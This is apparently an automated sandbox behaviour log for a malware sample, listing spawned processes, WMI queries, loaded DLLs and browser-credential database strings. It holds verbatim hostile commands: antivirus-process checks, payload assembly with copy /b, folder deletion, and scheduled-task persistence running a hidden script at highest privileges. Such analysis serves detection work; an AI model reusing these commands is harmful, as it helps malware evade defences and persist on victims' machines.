                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6584:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3012:120:WilError_03
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4196:120:WilError_03
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeFile created: C:\Users\user\AppData\Local\Temp\nsl9E55.tmpJump to behavior
                    Source: mg9LPWGtPB.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeFile read: C:\Users\desktop.iniJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.dr	Binary or memory string: UPDATE %Q.sqlite_master SET tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqliteX_autoindex%%' ESCAPE 'X' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.dr	Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: INSERT INTO "%w"."%w"("%w") VALUES('integrity-check');
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE IF NOT EXISTS %s.'rbu_tmp_%q' AS SELECT *%s FROM '%q' WHERE 0;
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.dr	Binary or memory string: INSERT INTO %Q.sqlite_master VALUES('index',%Q,%Q,#%d,%Q);
Source: Hist.pif, 0000000B.00000002.3097668223.000000003154B000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3103502423.000000006C6EF000.00000002.00000001.01000000.00000008.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp, nss3.dll.11.dr	Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(addr INT,opcode TEXT,p1 INT,p2 INT,p3 INT,p4 TEXT,p5 INT,comment TEXT,subprog TEXT,nexec INT,ncycle INT,stmt HIDDEN);
Source: tasklist.exe, 00000013.00000002.3071451041.0000000002F10000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Processh=3y;
Source: KKFBFC.11.dr, IJECAE.11.dr	Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: SELECT ALL * FROM %s LIMIT 0;CREATE TEMPORARY TABLE %s AS SELECT * FROM %sD
Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE "%w"."%w_parent"(nodeno INTEGER PRIMARY KEY,parentnode);
Source: Hist.pif, 0000000B.00000002.3078787220.000000000CCAF000.00000004.00000800.00020000.00000000.sdmp, Hist.pif, 0000000B.00000002.3078228591.000000000C878000.00000002.00001000.00020000.00000000.sdmp	Binary or memory string: CREATE TABLE x(type TEXT,schema TEXT,name TEXT,wr INT,subprog TEXT,stmt HIDDEN);
Source: Hist.pif, 0000000B.00000002.3091622580.0000000025667000.00000004.00000800.00020000.00000000.sdmp, softokn3.dll.11.dr	Binary or memory string: SELECT DISTINCT %s FROM %s where id=$ID LIMIT 1;
Source: mg9LPWGtPB.exe	ReversingLabs: Detection: 15%
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	File read: C:\Users\user\Desktop\mg9LPWGtPB.exe
Source: unknown	Process created: C:\Users\user\Desktop\mg9LPWGtPB.exe "C:\Users\user\Desktop\mg9LPWGtPB.exe"
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 787041
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SenatorsRamAspectYounger" Boat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Buffalo + Sims + Imagine 787041\l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif 787041\Hist.pif 787041\l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Process created: C:\ProgramData\EHIJJDGDHD.exe "C:\ProgramData\EHIJJDGDHD.exe"
Source: C:\ProgramData\EHIJJDGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 661592
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif 661592\Bk.pif 661592\h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\schtasks.exe	Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
Source: unknown	Process created: C:\Windows\System32\wscript.exe C:\Windows\system32\wscript.EXE //B "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
Source: C:\Users\user\Desktop\mg9LPWGtPB.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k move Handjob Handjob.cmd & Handjob.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 787041
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "SenatorsRamAspectYounger" Boat
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Buffalo + Sims + Imagine 787041\l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\787041\Hist.pif 787041\Hist.pif 787041\l
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process created: C:\ProgramData\EHIJJDGDHD.exe "C:\ProgramData\EHIJJDGDHD.exe"
Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c timeout /t 10 & rd /s /q "C:\ProgramData\JDAFIEHIEGDH" & exit
Source: C:\ProgramData\EHIJJDGDHD.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k copy Approximate Approximate.cmd & Approximate.cmd & exit
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe opssvc.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe tasklist
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe bdservicehost.exe nswscsvc.exe sophoshealth.exe"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c md 661592
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\findstr.exe findstr /V "RECEIVEFILLMEDIAEVALUATING" Natural
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Saturn + Demonstrated + Preceding + Eagles + Salon + Grows + Featured 661592\h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\661592\Bk.pif 661592\Bk.pif 661592\h
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 15
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout /t 10
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "SolarSys" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc onlogon /F /RL HIGHEST
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\schtasks.exe schtasks.exe /create /tn "Chassis" /tr "wscript //B 'C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.js'" /sc daily /mo 1 /ri 3 /du 23:57 /F /RL HIGHEST
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
Source: C:\Windows\System32\wscript.exe	Process created: C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif "C:\Users\user\AppData\Local\SunCraft Innovations\SolarSys.pif" "C:\Users\user\AppData\Local\SunCraft Innovations\Y"
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: shfolder.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Users\user\Desktop\mg9LPWGtPB.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: cmdext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\cmd.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: framedynos.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: dbghelp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: winsta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\tasklist.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\AppData\Local\Temp\787041\Hist.pif | Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, sspicli.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, dbghelp.dll, iertutil.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, urlmon.dll, srvcli.dll, netutils.dll, fwpuclnt.dll, schannel.dll, mskeyprotect.dll, msasn1.dll, dpapi.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, gpapi.dll, ncryptsslp.dll, wbemcomn.dll, amsi.dll, ntmarta.dll, mozglue.dll, vcruntime140.dll, msvcp140.dll, windowscodecs.dll, propsys.dll, edputil.dll, windows.staterepositoryps.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll, apphelp.dll, pcacli.dll, sfc_os.dll, windows.fileexplorer.common.dll, ntshrui.dll, cscapi.dll, linkinfo.dll
                    Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                    Source: C:\ProgramData\EHIJJDGDHD.exe | Section loaded: apphelp.dll, version.dll, kernel.appcore.dll, uxtheme.dll, shfolder.dll, windows.storage.dll, wldp.dll, propsys.dll, profapi.dll, edputil.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, windows.staterepositoryps.dll, sspicli.dll, wintypes.dll, appresolver.dll, bcp47langs.dll, slc.dll, userenv.dll, sppc.dll, onecorecommonproxystub.dll, onecoreuapcommonproxystub.dll
                    Source: C:\Windows\SysWOW64\cmd.exe | Section loaded: ntmarta.dll, cmdext.dll, apphelp.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
                    Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\tasklist.exe | Section loaded: version.dll, mpr.dll, framedynos.dll, dbghelp.dll, sspicli.dll, srvcli.dll, netutils.dll, sspicli.dll, kernel.appcore.dll, wbemcomn.dll, winsta.dll, amsi.dll, userenv.dll, profapi.dll
                    Source: C:\Users\user\AppData\Local\Temp\661592\Bk.pif | Section loaded: wsock32.dll, version.dll, winmm.dll, mpr.dll, wininet.dll, iphlpapi.dll, userenv.dll, uxtheme.dll, kernel.appcore.dll, windows.storage.dll, wldp.dll, ntmarta.dll, napinsp.dll, pnrpnsp.dll, wshbth.dll, nlaapi.dll, mswsock.dll, dnsapi.dll, winrnr.dll, rasadhlp.dll, urlmon.dll, iertutil.dll, srvcli.dll, netutils.dll, rstrtmgr.dll, ncrypt.dll, ntasn1.dll, sspicli.dll, cryptsp.dll, rsaenh.dll, cryptbase.dll, profapi.dll, ondemandconnroutehelper.dll, winhttp.dll, winnsi.dll, fwpuclnt.dll
                    Source: C:\Windows\SysWOW64\timeout.exe | Section loaded: version.dll
                    Source: C:\Windows\SysWOW64\schtasks.exe | Section loaded: kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll, kernel.appcore.dll, taskschd.dll, sspicli.dll, xmllite.dll
